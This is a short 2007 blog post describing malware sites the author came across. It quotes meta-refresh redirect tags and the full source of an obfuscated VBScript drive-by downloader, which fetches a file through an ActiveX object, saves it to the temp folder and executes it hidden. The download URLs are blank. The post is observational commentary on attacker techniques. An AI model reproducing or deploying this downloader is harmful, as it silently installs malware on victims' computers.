Saturday, May 05, 2007

Malware sites

I was pocking around the net, found some interesting malware sites:

Please don't try any of them unless you know what you are doing
< meta equiv="Refresh" content="0; URL=">
< meta equiv="Refresh" content="0; URL=">
"" Leia atentamente todas as exigencias.

And another type which uses vbscript
on error resume next
Dim haotian
Set y = Nothing
Set data = document.createElement(ppp2,"")
data.setAttribute ("classid"), ("clsid:BD96C556-65A3-11D0-983A-00C04FC29E36")
bbs ="Micro"
bbs0 ="delm"
bbs1 ="soft.XMLHTTP"
bbs2 =bbs&bbs1
result = Null And Null
Set x = data.CreateObject(bbs2,"")
set mm = data.createobject("Adodb.Stream","")
mm.type = 1
url = ""
x.Open ysha, url, False
bbp1 ="Scrip"
bbp2 ="ting.FileSystem"
bbp3 ="Object"
bbp =bbp1&bbp2&bbp3
mm.write x.responseBody
set F = data.createobject(bbp,"")
Set T = Nothing
set tmp = F.GetSpecialFolder(2)
exe= F.BuildPath(tmp,exe)
mm.savetofile exe,2
set Bb = data.createobject("Shell.Application","")
Bb.ShellExecute exe,"","","open",0

Little more Googling led me to this
which holds tons malware site, most of them are using the above two techniques, via embedding inside a script, flash or simply post the link.

Certainly most of these malwares are coded in different ways and have various features, such as keylogging, reverse connect, spwan a port, send credential over email or to irc etc. I don't feel surprise they use script to force victim to download their babies, but using < meta equiv="Refresh" content="0; URL=http://url"> is indeed pretty cool, coz it will be executed even you disable javascript in browser. I guess if it is possible to change exe to some other common mime type that a browser will download automatically, such as gif, swf etc will make the whole game more serious and horrible.

However, it is so funny to see how they work, and it is easy to steal what the attackers had collected due to most cracked stuff are stored in plain text.

No comments: